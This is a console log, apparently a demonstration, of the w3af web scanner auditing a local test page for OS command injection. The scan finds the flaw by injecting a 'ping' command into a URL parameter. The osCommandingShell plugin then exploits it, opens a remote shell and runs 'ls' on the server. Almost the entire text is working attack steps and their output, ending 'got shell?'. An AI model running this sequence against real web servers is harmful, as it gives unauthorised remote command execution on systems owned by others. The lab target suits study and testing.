dz0@sock3t:~/w3af$ ./w3af w3af>>> plugins w3af/plugins>>> output console,textFile w3af/plugins>>> output Enabled output plugins: textFile console w3af/plugins>>> output config textFile w3af/plugin/textFile>>> set fileName output-w3af.txt w3af/plugin/textFile>>> set verbosity 10 w3af/plugin/textFile>>> back w3af/plugins>>> output config console w3af/plugin/console>>> set verbosity 0 w3af/plugin/console>>> back w3af/plugins>>> back w3af>>> plugins w3af/plugins>>> audit osCommanding w3af/plugins>>> audit Enabled audit plugins: osCommanding w3af/plugins>>> back w3af>>> target w3af/target>>> set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 w3af/target>>> back w3af>>> start Found 1 URLs and 1 different points of injection. The list of URLs is: - http://localhost/w3af/osCommanding/vulnerable.php The list of fuzzable requests is: - http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command) Starting osCommanding plugin execution. 100% [====================================================] 1/1 OS Commanding was found at: http://localhost/w3af/osCommanding/vulnerable.php . Using method: GET. The data sent was: command=+ping+-c+6+localhost. The vulnerability was found in the request with id 3. w3af>>> exploit w3af/exploit>>> exploit osCommandingShell osCommandingShell exploit plugin is starting. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed. Vulnerability successfully exploited. This is a list of available shells: - [0] Please use the interact command to interact with the shell objects. w3af/exploit>>> interact 0 Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server. w3af/exploit/osCommandingShell-0>>> ls lalal vulnerable.php vulnerable2.php w3afAgentClient.log w3af/exploit/osCommandingShell-0>>> endInteraction w3af/exploit>>> back w3af>>> exit got shell? dz0@sock3t:~/w3af$